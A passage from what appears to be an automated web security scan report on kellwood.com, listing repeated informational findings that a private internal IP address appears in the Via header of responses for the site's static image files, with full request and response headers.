Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/aboutPage.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/aboutPage.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "415dcf18cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:07 GMT
X-Powered-By: ASP.NET
Content-Length: 108906
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432431
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......M.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
14.2. http://kellwood.com/_images/careersOff.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/careersOff.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/careersOff.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "76742c12eb92ca1:0"
Last-Modified: Mon, 11 Jan 2010 18:22:45 GMT
X-Powered-By: ASP.NET
Content-Length: 337
Date: Mon, 11 Apr 2011 17:19:51 GMT
X-Varnish: 2009433112
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...0...
......=-~....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE......rrr..................[[[......~~~fff...OOO...d....IDATx...I.. .C.$e0H..me(.{.*^.,...>..,..tM(..r....%..\..t...Cr....
...[SNIP]...
14.3. http://kellwood.com/_images/contactLink1off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink1off.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink1off.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "c02675e49accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:10 GMT
X-Powered-By: ASP.NET
Content-Length: 1779
Date: Mon, 11 Apr 2011 17:19:48 GMT
X-Varnish: 2009431363
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..:..........ZZZ...FFF......ooo...222............dddPPP............MMM......ttt...???...yyyggg%%%......!.......,......:.......di.h..l..p,.tm.v..|..3.pH,..;!r.l:}..tJ.z...v..z.`.6L.k..Z.I..$5.`
...[SNIP]...
14.4. http://kellwood.com/_images/contactLink1over.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink1over.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink1over.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "607658e49accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:10 GMT
X-Powered-By: ASP.NET
Content-Length: 1821
Date: Mon, 11 Apr 2011 17:20:23 GMT
X-Varnish: 2009450933
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..:................ZZZ...FFF......ooo222............eeePPP...............MMM...vvv......???...%%%......!.......,......:.... ..di.h..l..p,.tm.v..|..3.pH,..;!r.l:}..tJ.z...v..z.`.6L.k...Z.I..$5.h
...[SNIP]...
14.5. http://kellwood.com/_images/contactLink2off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink2off.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink2off.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "48793be49accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:10 GMT
X-Powered-By: ASP.NET
Content-Length: 1873
Date: Mon, 11 Apr 2011 17:19:49 GMT
X-Varnish: 2009431869
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..:....%%%...FFF.........oooZZZ......PPP...ddd......yyy............ttt......222...???MMM...ggg.........!.......,......:.......di.h..l..p,.tm.v..|..3.pH,..;!r.l:}..tJ.z...v..z.`.6L.k....BR..l5..
...[SNIP]...
14.6. http://kellwood.com/_images/contactLink2over.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink2over.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink2over.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "feee1ee49accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:10 GMT
X-Powered-By: ASP.NET
Content-Length: 1932
Date: Mon, 11 Apr 2011 17:20:22 GMT
X-Varnish: 2009450816
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..:....%%%.........FFF.........oooZZZ......PPP...ddd......yyy............ttt......222...???MMM.........!.......,......:....`..di.h..l..p,.tm.v..|..3.pH,..;!r.l:}..tJ.~...v..z.`.6L.k....CR..l5    .
...[SNIP]...
14.7. http://kellwood.com/_images/contactLink3off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink3off.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink3off.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "506b0e49accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:09 GMT
X-Powered-By: ASP.NET
Content-Length: 2275
Date: Mon, 11 Apr 2011 17:19:49 GMT
X-Varnish: 2009431872
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..X....oooFFF......ZZZ%%%.....................yyyddd......PPP......222............tttggg...???MMM......!.......,......X.......di.h..l..p,.tm.v..|..3.pH,..;!r.l:}..tJ.z...v..z.`.6L.k.....E.
....w
...[SNIP]...
14.8. http://kellwood.com/_images/contactLink3over.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink3over.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink3over.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "b060e2e39accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:09 GMT
X-Powered-By: ASP.NET
Content-Length: 2352
Date: Mon, 11 Apr 2011 17:20:22 GMT
X-Varnish: 2009450584
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..X....FFFooo...ZZZ.........%%%.....................yyyddd......OOO......222............ttt...ggg......!.......,......X....`..di.h..l..p,.tm.v..|..3.pH,..;!r.l:}..tJ.z...v..z.`.6L.k.....U...Q..w
...[SNIP]...
14.9. http://kellwood.com/_images/contactLink4off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink4off.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink4off.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "a2d6c5e39accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:09 GMT
X-Powered-By: ASP.NET
Content-Length: 2309
Date: Mon, 11 Apr 2011 17:19:49 GMT
X-Varnish: 2009431882
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..X....ooo...FFFZZZ%%%...........................dddPPPyyy......222???............ttt......MMMggg......!.......,......X.....'.di.h..l..p,..E.x..|....pH,....r.|!......Z.Xgv......X    ...<p........@.
...[SNIP]...
14.10. http://kellwood.com/_images/contactLink5off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactLink5off.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactLink5off.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "32ee78e39accb1:0"
Last-Modified: Tue, 15 Jun 2010 14:56:09 GMT
X-Powered-By: ASP.NET
Content-Length: 576
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432045
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89ax......ooo...ZZZ.........ddd.........PPPFFF............!.......,....x........I..8....`(.di.h..l.~O,.tm.x..|....pH,....r.l:...tJ.Z...6I(4
...\d......0D.....P......,..    p..1.....a..._........2..2..
...[SNIP]...
14.11. http://kellwood.com/_images/contactsPage.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/contactsPage.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/contactsPage.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "88d05cf08cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:05 GMT
X-Powered-By: ASP.NET
Content-Length: 106429
Date: Mon, 11 Apr 2011 17:19:48 GMT
X-Varnish: 2009431364
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......Q.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
14.12. http://kellwood.com/_images/copywright.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/copywright.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/copywright.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "feb7565091b2cb1:0"
Last-Modified: Wed, 12 Jan 2011 19:45:49 GMT
X-Powered-By: ASP.NET
Content-Length: 1445
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432451
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......
.............tEXtSoftware.Adobe ImageReadyq.e<...GIDATx...-LkM..i........K..Z...K..,.`)X....E..}r.d2wN..|.KG....w.g......+KZ..VVV...l.n............!..Y...V......{..n......vy
...[SNIP]...
14.13. http://kellwood.com/_images/dash.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/dash.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/dash.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "80585f30328ca1:0"
Last-Modified: Fri, 28 Aug 2009 17:15:49 GMT
X-Powered-By: ASP.NET
Content-Length: 130
Date: Mon, 11 Apr 2011 17:19:48 GMT
X-Varnish: 2009431365
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...    PLTE<<<,,,ZZZ........IDATx.b`bb`..0.......M.....IEND.B`.
14.14. http://kellwood.com/_images/kellwoodLogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/kellwoodLogo.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/kellwoodLogo.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "147f2834328ca1:0"
Last-Modified: Fri, 28 Aug 2009 17:15:55 GMT
X-Powered-By: ASP.NET
Content-Length: 910
Date: Mon, 11 Apr 2011 17:19:48 GMT
X-Varnish: 2009431348
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a..........999TTT{{{FFF............nnn......aaa.........!.......,.............I..8....`.1..    $..i...J..A..[b(.[:..0X..._.u422.W+.q8....Q01......v..E.
........$.b.a.!.....T.h.[...VX@xV.Te.`d.gi..VO
...[SNIP]...
14.15. http://kellwood.com/_images/menu1top.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/menu1top.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/menu1top.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "4cfc6d17542bca1:0"
Last-Modified: Tue, 01 Sep 2009 22:32:30 GMT
X-Powered-By: ASP.NET
Content-Length: 842
Date: Mon, 11 Apr 2011 17:20:04 GMT
X-Varnish: 2009438695
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......'.....,.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X.q.@..2.7.@. ....].U.. P....
D*@..J...q..n.7.r9!!...yof.I....w.'..mo.B.....@....@....@....@....@....@...?K.$I..!y.v.H.
...[SNIP]...
14.16. http://kellwood.com/_images/menu2top.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/menu2top.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/menu2top.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "c6ef3217542bca1:0"
Last-Modified: Tue, 01 Sep 2009 22:32:29 GMT
X-Powered-By: ASP.NET
Content-Length: 808
Date: Mon, 11 Apr 2011 17:20:04 GMT
X-Varnish: 2009438868
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...l...'........b....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.m.@.......;A.    ,OPg.....@..r&h2....    .N.u.......`.........B.w..|G.b$..j@\.....F.0...0...$...$. a$. a.    ....o.A..\.....I)
...[SNIP]...
14.17. http://kellwood.com/_images/menu3top.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/menu3top.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/menu3top.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "483c5017542bca1:0"
Last-Modified: Tue, 01 Sep 2009 22:32:30 GMT
X-Powered-By: ASP.NET
Content-Length: 769
Date: Mon, 11 Apr 2011 17:20:04 GMT
X-Varnish: 2009438869
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...g...'.......V.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.m.0.......    ..LPoPo.g.8...@...'.;..    .L`u....s/.*.Q.u.......{....1...L|.
H.ArH.Ar..Cr..Cr..C...C........u}..c....yil..
...[SNIP]...
14.18. http://kellwood.com/_images/menuSlider.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/menuSlider.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/menuSlider.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "c6add735328ca1:0"
Last-Modified: Fri, 28 Aug 2009 17:15:58 GMT
X-Powered-By: ASP.NET
Content-Length: 162
Date: Mon, 11 Apr 2011 17:19:48 GMT
X-Varnish: 2009431358
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......'......;......tEXtSoftware.Adobe ImageReadyq.e<....PLTEKKKUUU.t.5...2IDATx...1...........| .5.....................4X....N.Z.4......IEND.B`.
14.19. http://kellwood.com/_images/pTitleBar.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/pTitleBar.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/pTitleBar.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "dcae3336328ca1:0"
Last-Modified: Fri, 28 Aug 2009 17:15:59 GMT
X-Powered-By: ASP.NET
Content-Length: 910
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432450
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.............M.B.....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE...aaa000...???......~~~LLL$$$.........mmm..............IDATx..Z.v.0...s...o.Hr.......^6K....;@RG...3.Q`0\+.....=.l.>.#..
...[SNIP]...
14.20. http://kellwood.com/_images/privacyPolicyOff.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
